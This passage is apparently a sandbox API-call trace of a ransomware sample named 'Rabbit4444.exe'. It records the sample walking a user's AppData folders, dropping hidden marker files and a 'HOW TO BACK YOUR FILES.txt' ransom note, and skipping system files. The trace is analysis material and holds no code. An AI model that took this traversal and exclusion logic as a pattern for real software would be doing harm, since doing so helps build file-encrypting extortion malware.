(lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0053.933] CloseHandle (hObject=0x27c) returned 1 [0053.933] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache") returned 61 [0053.933] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0053.933] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe5380e4e, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xe538be0f, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0xe977a24e, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102810 [0053.933] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0053.933] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0053.933] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0053.933] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0053.934] FindNextFileW (in: hFindFile=0x102810, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe5380e4e, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xe538be0f, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0xe977a24e, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0053.934] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0053.934] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0053.934] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0053.934] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0053.934] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0053.934] FindNextFileW (in: hFindFile=0x102810, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xe977a24e, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xe977a24e, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xe977a24e, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0053.934] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0053.934] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0053.934] FindNextFileW (in: hFindFile=0x102810, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe538be0f, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xe538be0f, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0xe538be0f, ftLastWriteTime.dwHighDateTime=0x1d32736, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="G7ZD37Y5", cAlternateFileName="")) returned 1 [0053.934] lstrcmpiW (lpString1="G7ZD37Y5", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0053.934] lstrcmpiW (lpString1="G7ZD37Y5", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0053.934] lstrcmpiW (lpString1="G7ZD37Y5", lpString2="Rabbit4444.exe") returned -1 [0053.934] lstrcmpiW (lpString1="G7ZD37Y5", lpString2=".") returned 1 [0053.934] lstrcmpiW (lpString1="G7ZD37Y5", lpString2="..") returned 1 [0053.934] lstrcmpiW (lpString1="G7ZD37Y5", lpString2="windows") returned -1 [0053.934] lstrcmpiW (lpString1="G7ZD37Y5", lpString2="bootmgr") returned 1 [0053.934] lstrcmpiW (lpString1="G7ZD37Y5", lpString2="pagefile.sys") returned -1 [0053.934] lstrcmpiW (lpString1="G7ZD37Y5", lpString2="boot") returned 1 [0053.934] lstrcmpiW (lpString1="G7ZD37Y5", lpString2="ids.txt") returned -1 [0053.934] lstrcmpiW (lpString1="G7ZD37Y5", lpString2="NTUSER.DAT") returned -1 [0053.934] lstrcpyW (in: lpString1=0x130ebb4, lpString2="G7ZD37Y5" | out: lpString1="G7ZD37Y5") returned="G7ZD37Y5" [0053.934] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0xf6588 [0053.934] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x8e) returned 0x11ea68 [0053.934] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0xf6590 | out: ListHead=0xf68b0, ListEntry=0xf6590) returned 0xf6350 [0053.934] FindNextFileW (in: hFindFile=0x102810, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe538be0f, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xe538be0f, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0xe538be0f, ftLastWriteTime.dwHighDateTime=0x1d32736, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="G7ZD37Y5", cAlternateFileName="")) returned 0 [0053.934] FindClose (in: hFindFile=0x102810 | out: hFindFile=0x102810) returned 1 [0053.934] lstrcpyW (in: lpString1=0x130ebb4, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0053.934] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\adobe\\flash player\\assetcache\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0053.936] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x278 [0053.936] MapViewOfFile (hFileMappingObject=0x278, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0053.937] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0053.937] CloseHandle (hObject=0x278) returned 1 [0053.937] CloseHandle (hObject=0x27c) returned 1 [0053.937] GetCurrentThreadId () returned 0xd98 [0053.937] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0xf6590 [0053.937] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\G7ZD37Y5", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\G7ZD37Y5") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\G7ZD37Y5" [0053.937] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11ea68 | out: hHeap=0xe0000) returned 1 [0053.937] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6588 | out: hHeap=0xe0000) returned 1 [0053.937] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\G7ZD37Y5" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\G7ZD37Y5") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\G7ZD37Y5" [0053.937] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\G7ZD37Y5", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\G7ZD37Y5\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\G7ZD37Y5\\" [0053.937] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\G7ZD37Y5\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\G7ZD37Y5\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\G7ZD37Y5\\.BFC0E91B00AE8A0620D3" [0053.937] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\G7ZD37Y5\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\adobe\\flash player\\assetcache\\g7zd37y5\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0053.939] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0053.941] FlushFileBuffers (hFile=0x27c) returned 1 [0053.942] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\G7ZD37Y5\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0053.943] CloseHandle (hObject=0x27c) returned 1 [0053.943] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\G7ZD37Y5") returned 70 [0053.943] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0053.943] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\G7ZD37Y5\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe538be0f, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xe538be0f, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0xe977a24e, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102510 [0053.943] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0053.943] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0053.943] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0053.943] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0053.943] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe538be0f, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xe538be0f, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0xe977a24e, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0053.943] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0053.943] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0053.943] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0053.943] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0053.944] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0053.944] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xe977a24e, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xe977a24e, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xe97a3558, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0053.944] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0053.944] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0053.944] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xe977a24e, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xe977a24e, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xe97a3558, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0053.944] FindClose (in: hFindFile=0x102510 | out: hFindFile=0x102510) returned 1 [0053.944] lstrcpyW (in: lpString1=0x130ebc6, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0053.944] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\G7ZD37Y5\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\adobe\\flash player\\assetcache\\g7zd37y5\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0053.945] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x278 [0053.945] MapViewOfFile (hFileMappingObject=0x278, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0053.945] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0053.945] CloseHandle (hObject=0x278) returned 1 [0053.945] CloseHandle (hObject=0x27c) returned 1 [0053.945] GetCurrentThreadId () returned 0xd98 [0053.945] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0xf6350 [0053.945] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Acrobat", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Acrobat") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Acrobat" [0053.945] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11c5e0 | out: hHeap=0xe0000) returned 1 [0053.945] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6348 | out: hHeap=0xe0000) returned 1 [0053.945] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Acrobat" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Acrobat") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Acrobat" [0053.945] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Acrobat", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Acrobat\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Acrobat\\" [0053.945] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Acrobat\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Acrobat\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Acrobat\\.BFC0E91B00AE8A0620D3" [0053.945] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Acrobat\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\adobe\\acrobat\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0053.946] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0053.949] FlushFileBuffers (hFile=0x27c) returned 1 [0053.950] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Acrobat\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0053.950] CloseHandle (hObject=0x27c) returned 1 [0053.950] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Acrobat") returned 45 [0053.951] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0053.951] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Acrobat\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x715a3e1e, ftCreationTime.dwHighDateTime=0x1d327c9, ftLastAccessTime.dwLowDateTime=0x715a3e1e, ftLastAccessTime.dwHighDateTime=0x1d327c9, ftLastWriteTime.dwLowDateTime=0xe97a3558, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102750 [0053.951] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0053.951] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0053.951] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0053.951] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0053.951] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x715a3e1e, ftCreationTime.dwHighDateTime=0x1d327c9, ftLastAccessTime.dwLowDateTime=0x715a3e1e, ftLastAccessTime.dwHighDateTime=0x1d327c9, ftLastWriteTime.dwLowDateTime=0xe97a3558, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0053.951] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0053.951] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0053.951] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0053.951] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0053.951] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0053.951] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xe97a3558, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xe97a3558, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xe97a3558, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0053.951] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0053.951] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0053.951] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x715a3e1e, ftCreationTime.dwHighDateTime=0x1d327c9, ftLastAccessTime.dwLowDateTime=0x5bd69dbd, ftLastAccessTime.dwHighDateTime=0x1d35e02, ftLastWriteTime.dwLowDateTime=0x5bd69dbd, ftLastWriteTime.dwHighDateTime=0x1d35e02, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="DC", cAlternateFileName="")) returned 1 [0053.951] lstrcmpiW (lpString1="DC", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0053.951] lstrcmpiW (lpString1="DC", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0053.951] lstrcmpiW (lpString1="DC", lpString2="Rabbit4444.exe") returned -1 [0053.951] lstrcmpiW (lpString1="DC", lpString2=".") returned 1 [0053.951] lstrcmpiW (lpString1="DC", lpString2="..") returned 1 [0053.951] lstrcmpiW (lpString1="DC", lpString2="windows") returned -1 [0053.951] lstrcmpiW (lpString1="DC", lpString2="bootmgr") returned 1 [0053.951] lstrcmpiW (lpString1="DC", lpString2="pagefile.sys") returned -1 [0053.951] lstrcmpiW (lpString1="DC", lpString2="boot") returned 1 [0053.951] lstrcmpiW (lpString1="DC", lpString2="ids.txt") returned -1 [0053.951] lstrcmpiW (lpString1="DC", lpString2="NTUSER.DAT") returned -1 [0053.951] lstrcpyW (in: lpString1=0x130eb94, lpString2="DC" | out: lpString1="DC") returned="DC" [0053.951] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0xf6348 [0053.951] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x62) returned 0x120728 [0053.952] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0xf6350 | out: ListHead=0xf68b0, ListEntry=0xf6350) returned 0xf6570 [0053.952] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x715a3e1e, ftCreationTime.dwHighDateTime=0x1d327c9, ftLastAccessTime.dwLowDateTime=0x5bd69dbd, ftLastAccessTime.dwHighDateTime=0x1d35e02, ftLastWriteTime.dwLowDateTime=0x5bd69dbd, ftLastWriteTime.dwHighDateTime=0x1d35e02, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="DC", cAlternateFileName="")) returned 0 [0053.952] FindClose (in: hFindFile=0x102750 | out: hFindFile=0x102750) returned 1 [0053.952] lstrcpyW (in: lpString1=0x130eb94, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0053.952] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Acrobat\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\adobe\\acrobat\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0054.052] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x278 [0054.052] MapViewOfFile (hFileMappingObject=0x278, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0054.053] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0054.053] CloseHandle (hObject=0x278) returned 1 [0054.053] CloseHandle (hObject=0x27c) returned 1 [0054.053] GetCurrentThreadId () returned 0xd98 [0054.053] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0xf6350 [0054.053] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Acrobat\\DC", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Acrobat\\DC") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Acrobat\\DC" [0054.053] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x120728 | out: hHeap=0xe0000) returned 1 [0054.053] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6348 | out: hHeap=0xe0000) returned 1 [0054.053] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Acrobat\\DC" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Acrobat\\DC") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Acrobat\\DC" [0054.053] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Acrobat\\DC", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\" [0054.053] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\.BFC0E91B00AE8A0620D3" [0054.053] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\adobe\\acrobat\\dc\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0054.059] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0054.061] FlushFileBuffers (hFile=0x27c) returned 1 [0054.062] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0054.062] CloseHandle (hObject=0x27c) returned 1 [0054.063] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Acrobat\\DC") returned 48 [0054.063] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0054.063] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\*", 